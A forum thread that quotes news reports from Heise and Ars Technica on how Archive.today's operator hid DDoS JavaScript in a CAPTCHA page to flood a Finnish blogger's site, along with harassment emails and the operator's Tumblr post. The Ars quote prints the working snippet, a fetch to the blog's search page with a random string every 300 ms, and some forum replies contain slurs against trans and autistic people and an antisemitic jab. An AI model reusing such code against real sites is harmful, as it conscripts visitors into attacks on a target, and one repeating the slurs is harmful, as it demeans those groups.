Archive.today: Operator uses users for DDoS attack - Archive website accuses Finnish blogger of doxing him, sends DDOS in retaliation

Link (official translation from original German version)
Archive

The anonymous operator of Archive.today is unknowingly using visitors to their website in a Distributed Denial of Service (DDoS) attack against a Finnish blogger. On a splash page, which is intended to keep bots away using Google reCaptcha, JavaScript is hidden that sends an HTTP request to the Gyrovague.com page every 300 milliseconds in the user's browser. The background of the attack is apparently a disliked blog post by the affected party. Behind the attacked URL is the blog of Finn Janni Patokallio, who published the results of research on Archive.today in a post in 2023. German users who use Archive.today are thus operating in a legal gray area and could be committing a criminal offense, says a specialist lawyer for IT law.

The operator of Archive.today explained to a security researcher that the DDoS attack is intended to “slightly” increase the Finn's hosting costs. He feels “doxxed” by his blog post and is reacting to it with the DDoS attack. In the official Tumblr blog of Archive.today, which was recently posted on for the first time in two years, Patokallio and his family are sharply attacked. The post makes confused connections between Patokallio, an alleged Nazi past of his grandfather, arms trafficking, and Ukraine.

Blocks against media companies
The operator of Archive.today could not be reached by heise online via the email address provided on the site. In his Tumblr blog, he writes that he has blocked offices of the publisher Condé Nast because they published “propaganda” about his service. heise online has apparently also been affected by such a block for several days. The site is no longer accessible from the company network, and emails to the operator cannot be delivered. The cause of the block for heise online is apparently a report from November 2025, which concerned investigations by US authorities against Archive.today.

This report also mentioned and linked Janni Patokallio's blog post. In it, he explains, among other things, that Archive.today operates a botnet with changing IP addresses to circumvent anti-scraping measures. Archive.today allows previous versions of a website to be accessed, but in many cases, it also bypasses paywalls of publications. Patokallio also wrote that the operator(s) are based in Russia – a thesis that is, however, controversial online.

How the affected party reacts
Janni Patokallio explained in his blog that the DDoS attack does not cost him financially, as he uses web hosting at a flat rate. In addition, ad blockers like uBlock Origin now block the DDoS requests. The attack was apparently preceded by an email from the Archive.today operator, which he initially overlooked. When he finally replied, the operator threatened him with defamatory measures.

With his action, the operator of Archive.today may also be getting users from Germany into legal trouble. DDoS attacks are punishable by law. “If one is now unwittingly involved in such an attack, it cannot be criminally relevant due to a lack of intent; however, if one recognizes both the attack and one's own contribution in the form of calling up the form and knowingly accepts that this is realized as a supporting component, then a criminal offense would exist,” IT lawyer Jens Ferner assessed the legal situation when asked by heise online. While in practice criminal prosecution is unlikely due to the effort involved. However, the media reports making the attack public are likely to make intent easier to prove.

Ferner points to another side effect: By having Archive.today unknowingly let users access the Finnish blogger's URL, their IP addresses are transmitted to him. This could be a point of attack for prosecuting copyright infringements.
 
Click to expand...
Jemn Oopi said:
In the official Tumblr blog of Archive.today, which was recently posted on for the first time in two years, Patokallio and his family are sharply attacked.
Click to expand...
https://archive-is.tumblr.com/post/806966482173083648/ | Archive
Some time back, I sat down for an interview with Legal Tribune. The subject was mainly about paywalls and about the use of public archives to get around them. Now, that interview hasn’t seen the light of day yet (maybe it still will) but I reckon there are two reasons it got shelved. And those two reasons, in my judgment, deserve to be heard by the public.

They asked me, plain and proper: “Doesn’t the work of these archives undermine the business model of German media and by extension, democracy itself, truth, justice, and the whole Teutonic order?”

Well now, the natural answer to that is another question: What undermines that business model more — a quiet archive that does not advertise its accidental remedy, or a big newspaper article that reminds precisely those who can afford subscriptions that paywalls can be avoided?

Especially when we’re talking about Germany, a country with a mighty fine library system. A system where just about anyone with a library card (which is to say, just about everyone) can already get past paywalls. Even the hard ones. Even the kind the archives can’t crack. There are even special browser tools built just to make it easier. And you can’t fix that with some grand gesture like calling it “piracy” and blocking a domain on der Bundesbrandmauer.

But what can kill their business model is a public debate that marches straight into every German living room and says: “You don’t actually have to pay for this”, that in fact it is not “pay for access”, but merely “donate for our democracy”, and who would subscribe to that? That kind of idea spreads faster than any archive ever could.

Now, the second reason. And while I’m at it, let me address those who might accuse me of comparing Jani Patokallio to Hunter Biden yesterday. Yes sir, there is some friction between us and the German media. But it ain’t about paywalls. It’s about their wish to scrub from the archive the articles they already took down from their own site. And that makes a man wonder: how do they pull those same articles out of libraries too when a publisher has second thoughts?

What’s curious is this: almost every one of those stories is about the misadventures of wayward scions from respectable families, boys and girls who manage to tarnish their own last names with their behavior.

The most “toxic” content for us isn’t politics at all. It’s pages of hookers (kinetic ones, not virtual) and these well-born kids splashed across the papers. Not ministers. Not presidents. Just reputations in free fall.

And maybe that shouldn’t surprise us. After all, the word reputation comes from the same old root as puta.
 
Harvey Danger said:
I wish such an important resource was in less crazy hands.
Click to expand...

sadly so much of the free and open internet is run and maintained by autists, and autsitc troons all accursed with severe mental illness it makes any stability an impossibility as functionality depends on the whims of their personality disorder, i wish more people were just normal.
 
Ars Technica: Archive.today CAPTCHA page executes DDoS; Wikipedia considers banning site (archive) (mega)

DDoS hit blog that tried to uncover Archive.today founder’s identity in 2023.

Jon Brodkin – Feb 10, 2026

Wikipedia editors are discussing whether to blacklist Archive.today because the archive site was used to direct a distributed denial of service (DDoS) attack against a blogger who wrote a post in 2023 about the mysterious website’s anonymous maintainer.

In a request for comment page [archive] [ghost] [mega], Wikipedia’s volunteer editors were presented with three options. Option A is to remove or hide all Archive.today links and add the site to the spam blacklist. Option B is to deprecate Archive.today, discouraging future link additions while keeping the existing archived links. Option C is to do nothing and maintain the status quo.

Option A in particular would be a huge change, as more than 695,000 links to Archive.today are used across 400,000 or so Wikipedia pages. Archive.today, also known as Archive.is, is a website that saves snapshots of webpages and is commonly used to bypass news paywalls.

“Archive.today uses advanced scraping methods, and is generally considered more reliable than the Internet Archive,” the Wikipedia request for comment said. “Due to concerns about botnets, linkspamming, and how the site is run, the community decided to blacklist it in 2013. In 2016, the decision was overturned, and archive.today was removed from the spam blacklist.”

Discussion among editors has been ongoing since February 7. “Wikipedia’s need for verifiable citations is absolutely not more important than the security of users,” one editor in favor of blacklisting wrote. “We need verifiable citations so that we can maintain readers’ trust, however, in order to be trustworthy our references also have to be safe to access.”

Archive would be hard to replace​

On the other side, an editor who supported Option C wrote that “Archive.today contains a vast amount of archives available nowhere else. Not on Wayback Machine, nowhere. It is the second largest archive provider across all Wikimedia sites. Removal/blockage of this site will be disruptive daily for thousands of editors and readers. It will result in a huge proliferation of {{dead link}} tags that will never be resolved.”

Several posts mentioned an ongoing FBI case that could eventually make the Archive.today links useless anyway. Some said it would be better to act now than to have Option A forced on them later without a backup plan.

One editor supported starting with Option B and eventually shifting to Option A with “the proper end goal being the WMF [Wikimedia Foundation] supporting some sort of archive system, whether their own original or directly supporting the Internet Archive’s work so it can be done more systematically.”

Some discussion centered on copyright infringement, given that Archive.today publishes copies of many copyrighted articles. “On the general problem of linking to copyright infringement: perhaps the Wikimedia Foundation can work on ways to establish legally licensed archives of major paywalled sites, in partnership with archives such as the Internet Archive,” one editor wrote. “It would be challenging given the business model of those sites, but maybe a workable compromise can be established that manages how many Wikipedia editors [have] access at a given time.”

Malicious code in CAPTCHA page​

The DDoS attack being discussed by Wikipedia editors was targeted at the Gyrovague blog written by Jani Patokallio. Last month, “the maintainers of Archive.today injected malicious code in order to perform a distributed denial of service attack against a person they were in dispute with,” the Wikipedia request for comment says. “Every time a user encounters the CAPTCHA page, their Internet connection is used to attack a certain individual’s blog.”

The trustworthiness of Archive.today was discussed in light of evidence that the site’s founder threatened to create “a new category of AI porn” in retaliation against the blogger. The AI porn threat was mentioned by several editors.

“I echo others [that Option] A is looking like something we’ll have to do eventually, anyways, and at least this way we have a chance to do it on our terms,” one editor wrote. “I hate to break it to you, but even if the FBI thing goes nowhere, a website whose operator apparently threatens to create AI porn in retaliation against enemies, using their names, isn’t a trustworthy mirror, and isn’t going to remain one.”

One editor reported being “miserable” about supporting Option A, “but we cannot permit websites to rope our readers into being part of DDoS attacks.” Moreover, “The fact is that most of the archive.today links on Wikipedia are not an attempt to save URLs that have now gone dead that the Internet Archive cannot handle, but efforts to bypass paywalls, which is convenient, but illegal. It’s strange that we accept links to archive.today for this purpose but don’t accept the same for Anna’s Archive or Sci-Hub,” the editor wrote.

Patokallio told us in an email today, “it’s true that there simply are no alternatives to archive.today for many sources that archive.org does not/cannot cover,” and that he hopes the Wikipedia request for comment “leads to the Wikimedia Foundation creating one as suggested by multiple commenters in the thread.”

We emailed the Archive.today’s webmaster address today about the Wikipedia discussion and will update this article if we get a response.

The Wikimedia Foundation, the nonprofit that hosts Wikipedia, chimed in on the discussion today. “Our view is that the value to verifiability that the site provides must be weighed against the security risks and violation of the trust of the people who click these links,” wrote Eric Mill, head of the foundation’s product safety and integrity group. “We (WMF) encourage the English Wikipedia community to carefully weigh the situation before making a decision on this unusual case.”

Noting that “Archive.today’s owner has not been deterred from continuing the ongoing DDoS,” Mill wrote that “the same actions that make archive.today unsafe may also reduce its usefulness for verifying content on Wikipedia. If the owners are willing to abuse their position to further their goals through malicious code, then it also raises questions about the integrity of the archive it hosts.”

It’s possible the Wikimedia Foundation will act even if the volunteer editors decide to maintain the status quo. “We know that WMF intervention is a big deal, but we also have not ruled it out, given the seriousness of the security concern for people who click the links that appear across many wikis,” Mill wrote.

Blogger tried to uncover founder’s identity​

The Wikipedia request for comments acknowledged that whether to blacklist would be a difficult decision. There are “significant concerns for readers’ safety, as well as the long-term stability and integrity of the service,” but “a significant amount of people also think that mass-removing links to Archive.today may harm verifiability, and that the service is harder to censor than certain other archiving sites,” it said.

An update to the request for comments yesterday indicated that the attack temporarily stopped, but the malicious code had been reactivated. “Please do not visit the archive without blocking network requests to gyrovague.com to avoid being part of the attack!” it said.

The code’s first public mention was apparently in a Hacker News thread on January 14, and Patokallio wrote about the DDoS in a February 1 blog post. “Every 300 milliseconds, as long as the CAPTCHA page is open, this makes a request to the search function of my blog using a random string, ensuring the response cannot be cached and thus consumes resources,” he wrote. The Javascript code in the Archive.today CAPTCHA page is as follows:

JavaScript: 
setInterval(function() {
            fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
                referrerPolicy: "no-referrer",
                mode: "no-cors"
            });
        }, 300);

In August 2023, Patokallio wrote a post attempting to uncover the identity of Archive.today founder “Denis Petrov,” which seems to be an alias. Patokallio wasn’t able to figure out who the founder is but cobbled together various tidbits from Internet searches, including a Stack Exchange post that mentioned another potential alias, “Masha Rabinovich.”

Patokallio seemed to be driven by curiosity and was impressed by Archive.today’s work. “It’s a testament to their persistence that [they’ve] managed to keep this up for over 10 years, and I for one will be buying Denis/Masha/whoever a well deserved cup of coffee,” Patokallio’s 2023 post said. In his post this month, Patokallio said his 2023 blog “gathered some 10,000 views and a bit [of] discussion on Hacker News, but didn’t exactly set the blogosphere on fire. And indeed, absolutely nothing happened for the next two years and a bit.”

FBI case revives interest in 2023 blog​

But in October 2025, the FBI sent a subpoena to domain registrar Tucows seeking “subscriber information on [the] customer behind archive.today” in connection with “a federal criminal investigation being conducted by the FBI.” We wrote about the subpoena, and our story included a link to Patokallio’s 2023 blog post in a sentence that said, “There are several indications that the [Archive.today] founder is from Russia.”

In an email to Ars, Patokallio told us that the DDoS attack “appears to be because you kindly mentioned my blog in your Nov 8, 2025 story.” Patokallio added that he is “as mystified by this as you probably are.” Articles about the subpoena by The Verge and Heise Online also linked to Patokallio’s 2023 blog post.

On January 8, 2026, Patokallio’s hosting company, Automattic, notified him that it received a GDPR [General Data Protection Regulation] complaint from a “Nora Puchreiner” alleging that the 2023 post “contains extensive personal data… presented in a narrative that is defamatory in tone and context.” Patokallio said that after he submitted a rebuttal, “Automattic sided with me and left the post up.”

Patokallio said he also “received a politely worded email from archive.today’s webmaster asking me to take down the post for a few months” on January 10. The email was classified as spam by Gmail, and he didn’t see it until five days later, he said. In the meantime, the DDoS started.

Patokallio said he replied to the webmaster’s email on January 15 and again on January 20 but didn’t hear back. He tried a third time on January 25, saying he would not take down the blog post but offered to “change some wording that you feel is being misrepresented.”

Emails threatened AI porn and other scams​

Patokallio posted what he called a lightly redacted copy of the resulting email thread. The first email from the Archive.today webmaster said, “I do not mind the post, but the issue is: journos from mainstream media (Heise, Verge, etc) cherry-pick just a couple of words from your blog, and then construct very different narratives having your post the only citable source; then they cite each other and produce a shitty result to present for a wide audience.”

In a later email, “Nora Puchreiner” wrote, “I do not care on your blog and its content. I just need the links from Heise and other media to be 404.” One message threatened to investigate “your Nazi grandfather” and “vibecode a gyrovague.gay dating app.” Another threatened to create a public association between Patokallio’s name and AI porn.

A Tumblr blog post apparently written by the Archive.today founder seems to generally confirm the emails’ veracity, but says the original version threatened to create “a patokallio.gay dating app,” not “a gyrovague.gay dating app.” The Tumblr blog has several other recent posts criticizing Patokallio and accusing him of hiding his real name. However, the Gyrovague blog shows Patokallio’s name in a sidebar and discloses that he works for Google in Sydney, Australia, while stating that the blog posts contain only his personal views.

In one email, Patokallio included a link to Wikipedia’s page on the Streisand effect, a name for situations in which people seeking to suppress access to information instead draw more public attention to the information they want hidden. The Archive.today site maintainer apparently viewed this as a threat.

“And threatening me with Streisand… having such a noble and rare name, which in retaliation could be used for the name of a scam project or become a byword for a new category of AI porn… are you serious?” the email said. Patokallio responded, “No, you’re Streisanding yourself: the DDOS has already drawn more attention to my blog post than it had gotten in the last two years, with zero action on my side.”

A subsequent reply in the email thread contained the “Nazi grandfather” and “gay dating app” threats. Patokallio wrote that after these emails, it didn’t seem worthwhile to continue the discussion. “At this point it was pretty clear the conversation had run its course, so here we are,” Patokallio wrote in his February 1 blog post. “And for the record, my long-dead grandfather served in an anti-aircraft unit of the Finnish Army during WW2, defending against the attacks of the Soviet Union. Perhaps this is enough to qualify as a ‘Nazi’ in Russia these days.”

While the outcome at Wikipedia is not yet settled, Patokallio wrote that the DDoS attack didn’t cause him any real harm. The Archive.today maintainer apparently intended to make Patokallio’s hosting costs more expensive, but “I have a flat fee plan, meaning this has cost me exactly zero dollars,” he wrote.

This article was updated with a statement from the Wikimedia Foundation and further comment from Patokallio.


https://arstechnica.com/civis/threa...-after-site-maintainer-ddosed-a-blog.1511586/ (archive) (ghost) (mega)

https://arstechnica.com/civis/threa...-site-maintainer-ddosed-a-blog.1511586/page-2 (archive) (ghost) (mega)

Comments hidden by downvotes:

ars-hidden-comments-L.webp
 
Finnish blogger....did Keffals still resides in Finland? I know it's just only a coincidence but talk about a coincidence or as some said a "cohencidence".
 
Super-Chevy454 said:
Finnish blogger....did Keffals still resides in Finland? I know it's just only a coincidence but talk about a coincidence or as some said a "cohencidence".
Click to expand...
You were thinking of Ire Land.

Let's face it, the Archive.today operator is acting unstable and needs to deescalate, before real damage is done.
 
You must log in or register to reply here.
Back
Top Bottom